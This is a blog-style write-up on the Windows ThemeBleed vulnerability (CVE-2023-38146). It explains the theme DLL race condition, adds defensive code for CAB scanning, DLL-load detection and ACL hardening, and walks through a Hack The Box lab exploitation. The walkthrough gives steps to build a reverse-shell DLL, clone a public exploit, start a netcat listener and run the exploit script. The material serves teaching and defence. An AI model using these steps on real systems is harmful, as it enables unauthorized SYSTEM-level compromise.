Understanding CVE-2023-38146: Deep Dive into the ThemeBleed Vulnerability
ThemeBleed (CVE-2023-38146) is a critical vulnerability in the Windows Theme feature that allows local privilege escalation through improper handling of theme binary data.
What is ThemeBleed?
ThemeBleed is a security vulnerability in the Windows Theme Binary Data feature where improper handling of theme files can lead to:
- Local privilege escalation
- Arbitrary file read
- Potential system compromise
Technical Deep Dive:
Component Overview:
The vulnerability exists in several key Windows components:
Affected Components:
├── Theme Binary Data Parser
│   ├── Handles .THEME and .MSSTYLES files
│   └── Responsible for version validation
├── Windows Theme Service
│   ├── Loads theme resources
│   └── Manages DLL verification
└── Desktop Window Manager
    ├── Applies visual themes
    └── Executes theme components
Discovery Background:
Security researcher Will Kirkpatrick discovered this vulnerability while investigating uncommon Windows file formats, specifically focusing on the .THEME format used for Windows visual customization.
Vulnerability Details:
The vulnerability involves several key components:
Theme Components:
├── .THEME files
│   └── Contains appearance settings
├── .MSSTYLES files
│   ├── Should only contain graphical resources
│   └── No executable code intended
└── Version handling
    ├── Special "999" version number
    └── Improper DLL validation
Race Condition Exploitation:
The core issue lies in the handling of .MSSTYLES files when a specific version number (999) is used:
- Initial DLL Verification:
  - System checks the signature of the accompanying "_vrf.dll"
  - Validates file integrity
- Race Window:
  - Time gap between verification and loading
  - Allows DLL replacement
  - Original verification becomes invalid
- Exploitation:
  - Malicious DLL can be substituted
  - System loads replaced DLL
  - Arbitrary code execution achieved
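The verification-then-load gap above is a classic time-of-check/time-of-use race. The following is an added example (not Microsoft's theme loader and not code from any PoC) that models it deterministically: the "disk" is a dict from path to bytes, the Authenticode check is stood in for by a SHA-256 allow-list of trusted images, and the race window is a callback so the swap can be triggered on demand. It shows why the fix is to verify the exact bytes you go on to use, rather than to verify a path and then open it a second time.

```python
"""Verify-then-load versus verify-what-you-load.

Added example for illustration; a deterministic model of the race
described above, not Microsoft's theme loader and not PoC code.
Assumptions: the "disk" is a dict from path to bytes, and Authenticode
signature checking is replaced by a SHA-256 allow-list of trusted images.
"""
import hashlib

# Constructed stand-in for a trusted, signed verifier DLL image.
TRUSTED_IMAGE = b"MZ-constructed-trusted-vrf-dll"
TRUSTED_DIGESTS = {hashlib.sha256(TRUSTED_IMAGE).hexdigest()}

# Constructed stand-in for a DLL that does not pass verification.
UNTRUSTED_IMAGE = b"MZ-constructed-untrusted-vrf-dll"


def passes_verification(image: bytes) -> bool:
    """Stand-in for the signature check: is this exact image on the allow-list?"""
    return hashlib.sha256(image).hexdigest() in TRUSTED_DIGESTS


def load_racy(disk: dict, path: str, during_window=None) -> bytes:
    """Verify the file by path, then load it by path again (two lookups).

    Anything that changes the path between the two lookups is loaded
    without ever having been verified. ``during_window`` models that gap.
    """
    if not passes_verification(disk[path]):
        raise PermissionError(f"{path}: verification failed")
    if during_window is not None:
        during_window()            # the race window described above
    return disk[path]              # second lookup: whatever is there now


def load_safe(disk: dict, path: str, during_window=None) -> bytes:
    """Read the bytes once, verify those bytes, and hand back the same bytes.

    The window still exists, but a later change to the path cannot affect
    what was verified, because verification and use share one object.
    """
    image = disk[path]
    if not passes_verification(image):
        raise PermissionError(f"{path}: verification failed")
    if during_window is not None:
        during_window()
    return image


def demonstrate(path: str = "Aero.msstyles_vrf.dll") -> dict:
    """Run both loaders against a disk whose file is swapped mid-window.

    Returns, per loader, whether the bytes it finally handed back would
    have passed verification.
    """
    results = {}
    for name, loader in (("racy", load_racy), ("safe", load_safe)):
        disk = {path: TRUSTED_IMAGE}

        def swap(disk=disk):       # replaces the file inside the window
            disk[path] = UNTRUSTED_IMAGE

        loaded = loader(disk, path, during_window=swap)
        results[name] = passes_verification(loaded)
    return results


if __name__ == "__main__":
    print(demonstrate())           # {'racy': False, 'safe': True}
```

The racy loader ends up returning an image that never passed the check, while the safe loader returns exactly what it verified; on a real system the equivalent is holding one open handle (or one mapped image) for both the signature check and the load.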
Distribution Vector:
The vulnerability has two interesting distribution aspects:
- Direct Theme Files:
  - Downloads trigger mark-of-the-web warnings
  - Users receive security prompts
  - Some protection provided
- THEMEPACK Bypass:
  - .THEMEPACK files are CAB archives
  - Automatically extract and apply themes
  - Bypass mark-of-the-web protection
  - No security warnings shown
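Because a .THEMEPACK is a plain CAB archive that Windows unpacks and applies on open, a mail or web gateway can triage one without extracting it: the CAB directory (CFFILE table) is a fixed-layout structure that lists every member name and size. The following added example (not code from the page's PoC or from Microsoft, standard library only) walks that directory and flags packs that carry native code, which is the check behind the "block .THEMEPACK files at the network edge" advice later on this page. The sample archives are constructed in-line by build_cab() and are not real theme packs; the CAB header, folder, file and data layouts follow Microsoft's cabinet format, and no compressed data block is ever decoded.

```python
"""List and triage the members of a .THEMEPACK (Microsoft CAB) container.

Added defensive example, not code from the page's PoC or from Microsoft.
Standard library only; the sample archives are constructed by build_cab()
below and are not real theme packs.
"""
import struct

CFHEADER = struct.Struct("<4sIIIIIBBHHHHH")   # 36-byte cabinet header
CFFOLDER = struct.Struct("<IHH")              # 8-byte folder entry
CFFILE = struct.Struct("<IIHHHH")             # 16 bytes, then NUL-terminated name
CFDATA = struct.Struct("<IHH")                # 8-byte data block header
ATTR_NAME_IS_UTF = 0x80                       # CFFILE.attribs: name is UTF-8
COMPRESSION_NONE = 0


def list_cab_members(data: bytes) -> list:
    """Return [(name, uncompressed_size)] by walking the CFFILE table.

    No CFDATA block is decompressed, so the scanner never runs a decoder
    over untrusted bytes; it only reads the fixed-layout directory.
    """
    if len(data) < CFHEADER.size or data[:4] != b"MSCF":
        raise ValueError("not a CAB archive (missing MSCF signature)")
    (_sig, _r1, cb_cabinet, _r2, coff_files, _r3, _vmin, _vmaj,
     _c_folders, c_files, _flags, _set_id, _icab) = CFHEADER.unpack_from(data, 0)
    if cb_cabinet != len(data):
        raise ValueError("cbCabinet does not match the data length")
    members = []
    pos = coff_files                            # absolute offset of first CFFILE
    for _ in range(c_files):
        if pos + CFFILE.size > len(data):
            raise ValueError("truncated CFFILE table")
        cb_file, _start, _folder, _date, _time, attribs = CFFILE.unpack_from(data, pos)
        pos += CFFILE.size
        end = data.find(b"\x00", pos)
        if end < 0:
            raise ValueError("unterminated member name")
        codec = "utf-8" if attribs & ATTR_NAME_IS_UTF else "ascii"
        members.append((data[pos:end].decode(codec, "replace"), cb_file))
        pos = end + 1
    return members


def themepack_findings(data: bytes) -> list:
    """Flag members a theme pack has no reason to carry."""
    findings = []
    for name, size in list_cab_members(data):
        low = name.lower()
        if low.endswith(".dll") or "_vrf" in low:
            findings.append(f"native code in theme pack: {name} ({size} bytes)")
        elif low.endswith(".msstyles"):
            findings.append(f"msstyles (a PE image) present: {name}")
    return findings


def build_cab(members: list) -> bytes:
    """Build a minimal one-folder, uncompressed CAB from [(name, bytes)].

    Constructed for exercising the scanner; the CFDATA checksum is left 0.
    """
    payload = b"".join(content for _, content in members)
    files, offset = b"", 0
    for name, content in members:
        files += CFFILE.pack(len(content), offset, 0, 0, 0, 0x20) + name.encode("ascii") + b"\x00"
        offset += len(content)
    coff_files = CFHEADER.size + CFFOLDER.size
    coff_data = coff_files + len(files)
    folder = CFFOLDER.pack(coff_data, 1, COMPRESSION_NONE)
    block = CFDATA.pack(0, len(payload), len(payload)) + payload
    header = CFHEADER.pack(b"MSCF", 0, coff_data + len(block), 0, coff_files, 0,
                           3, 1, 1, len(members), 0, 0, 0)
    return header + folder + files + block


# Constructed samples: a benign pack and one that carries a verifier DLL.
BENIGN_PACK = build_cab([("Aero.theme", b"[Theme]\r\nDisplayName=Sample\r\n"),
                         ("wallpaper.jpg", b"\xff\xd8\xff\xe0")])
SUSPECT_PACK = build_cab([("Aero.theme", b"[Theme]\r\n"),
                          ("Aero.msstyles", b"MZ"),
                          ("Aero.msstyles_vrf.dll", b"MZ")])

if __name__ == "__main__":
    for label, pack in (("benign", BENIGN_PACK), ("suspect", SUSPECT_PACK)):
        print(label, list_cab_members(pack), themepack_findings(pack))
```

The scanner deliberately trusts nothing beyond the directory: it validates the signature and total length, bounds-checks each CFFILE entry, and never touches the compressed payload, so it can sit in front of untrusted downloads without becoming a decompression-bomb or decoder-bug target itself.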
Real-World Exploitation Example:
- This was performed on the Hack The Box machine Aero:
Available Proof of Concept:
A public POC for the ThemeBleed exploit is available at:
- https://github.com/Jnnshschl/CVE-2023-38146
- The creator has also written a blog post to accompany the POC.
- Note: There are multiple POCs, but this is just my preferred one.
Exploitation Process
- Payload Preparation:
  - Create malicious DLL containing reverse shell code
  - Configure connection parameters (IP, port)
  - Compile in Release mode for target architecture
- Exploit Setup:
  Directory Structure:
  └── exploit_root/
      ├── tb/
      │   ├── Aero.msstyles_vrf_evil.dll   # Our compiled reverse shell DLL that gains SYSTEM
      │   ├── Aero.msstyles                # Modified theme file that triggers the exploit
      │   └── Aero.msstyles_vrf.dll        # Legitimate Microsoft-signed DLL we race against
      └── themebleed.py                    # Python script that orchestrates the attack
- Execution Flow:
  - Attacker starts listener on control server
  - Exploit script triggers theme loading
  - Race condition allows DLL substitution
  - Reverse shell connects to attacker
Building the ThemeBleed CVE-2023-38146 Reverse Shell DLL:
The exploit requires a reverse shell DLL. A POC for this is available at:
- Development Environment Setup:
  - Windows 10 VM (my preferred version is set up using the Mandiant Commando script)
  - Visual Studio (not Visual Studio Code)
- Building Process:
  - Open Visual Studio and clone the repo:
  - Configure attack parameters:
    - Locate main.cpp
    - Set attack IP and port (lines 32/34)
    - Set "autoReconnect" to false
  - Prepare for compilation:
    - Set to Release mode
    - Build the solution:
    - Note: "Building the solution" means compiling the exploit
    - Locate the compiled DLL at:
      C:\Users\[YourUserName]\source\repos\ThemeBleedReverseShellDLL\x64\Release\ThemeBleeedReverseShell.dll
Executing the Exploit
- Clone the main exploit repository:
  git clone https://github.com/Jnnshschl/CVE-2023-38146.git
- Prepare the payload:
  - Move ThemeBleeedReverseShell.dll to the tb folder
  - Rename it to Aero.msstyles_vrf_evil.dll
  - Note: The repository mentions a td folder, but it's actually tb
- Start the listener:
  rlwrap -cAr nc -nvlp 4711
- Execute the exploit:
  python3 themebleed.py -r [MYAttackMachine] --no-dll
- Receive the connection:
Impact Analysis:
Affected Systems:
| Windows Version | Architecture | Vulnerable |
|---|---|---|
| Windows 11 | x64 | Yes |
| Windows 10 | x64 | Yes |
| Server 2019 | x64 | Yes |
| Server 2022 | x64 | Yes |
Security Implications:
The vulnerability can lead to:
- Local privilege escalation
- System compromise
- Unauthorized file access
Mitigation:
Mitigation Strategies
- System Updates:
  - Apply latest Windows security updates
  - Enable automatic updates
- Access Controls:
  ```powershell
  # PowerShell: restrict theme directory access
  # Read the current ACL of the themes directory
  $acl = Get-Acl "C:\Windows\Resources\Themes"
  # Build an Allow rule that grants the Users group read-only access
  $rule = New-Object System.Security.AccessControl.FileSystemAccessRule("Users", "Read", "Allow")
  # Replace the explicit Allow rules for Users with the read-only rule
  $acl.SetAccessRule($rule)
  # Write the modified ACL back to the directory
  Set-Acl "C:\Windows\Resources\Themes" $acl
  ```
- Group Policy Settings:
  - Disable theme changes for standard users
  - Restrict access to theme directories
Prevention Best Practices
- System Hardening:
  - Implement principle of least privilege
  - Regular security updates
  - Monitor theme-related activities
- Security Controls:
  - Application control policies
  - User access restrictions
  - System monitoring
  - Block .THEMEPACK files at network edge
  - Monitor DLL loading during theme changes
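"Monitor DLL loading during theme changes" is concrete enough to turn into a detection: the race above ends with the system loading a `*_vrf.dll` that was swapped after verification, so an image-load record for such a DLL that is unsigned at load time, or that comes from a network share, is the signal to alert on. The following added example (not from the page's PoC or from Microsoft) runs that logic over constructed Sysmon-style Event ID 7 records. The field names (Image, ImageLoaded, Signed, SignatureStatus) are Sysmon's; the paths, the process, and the 192.0.2.10 share address are made up for the example, and the theme-root path and severity scheme are assumptions of this code, not values from the page.

```python
"""Flag theme verifier DLL loads in Sysmon-style ImageLoad records.

Added example of the "monitor DLL loading during theme changes" control;
not from the page's PoC or from Microsoft. Records are dicts using the
field names of Sysmon Event ID 7 (Image, ImageLoaded, Signed,
SignatureStatus); every value below is constructed, including the
192.0.2.10 share address.
"""
import re

VRF_DLL = re.compile(r"_vrf\.dll$", re.IGNORECASE)
THEME_ROOT = "c:\\windows\\resources\\themes\\"   # assumed trusted location


def classify_image_load(event: dict):
    """Return a finding dict for a *_vrf.dll load, or None for anything else.

    Any load of a theme verifier DLL is worth a look (medium); one that is
    unsigned at load time or comes from a network share is escalated (high),
    since that is what a DLL swapped inside the race window looks like.
    """
    if event.get("EventID") != 7:
        return None
    loaded = event.get("ImageLoaded", "")
    if not VRF_DLL.search(loaded):
        return None
    low = loaded.lower()
    remote = low.startswith("\\\\")
    off_root = not remote and not low.startswith(THEME_ROOT)
    unsigned = (event.get("Signed", "").lower() != "true"
                or event.get("SignatureStatus") != "Valid")
    reasons = []
    if remote:
        reasons.append("loaded over a UNC/network path")
    if off_root:
        reasons.append("loaded from outside the Windows themes directory")
    if unsigned:
        reasons.append("no valid Authenticode signature at load time")
    return {
        "severity": "high" if (remote or unsigned) else "medium",
        "process": event.get("Image"),
        "loaded": loaded,
        "reasons": reasons or ["theme verifier DLL loaded"],
    }


def scan_events(events) -> list:
    """Run the classifier over an iterable of records, keeping only findings."""
    return [f for f in (classify_image_load(e) for e in events) if f]


# Constructed Sysmon-style records (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 7, "Image": "C:\\Windows\\explorer.exe",
     "ImageLoaded": "C:\\Windows\\System32\\uxtheme.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"EventID": 7, "Image": "C:\\Windows\\explorer.exe",
     "ImageLoaded": "C:\\Users\\user\\Downloads\\tb\\Aero.msstyles_vrf.dll",
     "Signed": "false", "SignatureStatus": "Unavailable"},
    {"EventID": 7, "Image": "C:\\Windows\\explorer.exe",
     "ImageLoaded": "\\\\192.0.2.10\\tb\\Aero.msstyles_vrf.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"EventID": 7, "Image": "C:\\Windows\\explorer.exe",
     "ImageLoaded": "C:\\Windows\\Resources\\Themes\\Aero\\Aero.msstyles_vrf.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"EventID": 1, "Image": "C:\\Windows\\explorer.exe"},
]

if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(finding["severity"], finding["loaded"], "; ".join(finding["reasons"]))
```

The detector keys on the file-name suffix rather than on a hash because the whole point of the race is that the bytes loaded are not the bytes that were verified; the signature state Sysmon records at load time, and the load path, are what distinguish the swapped DLL from the legitimately signed one.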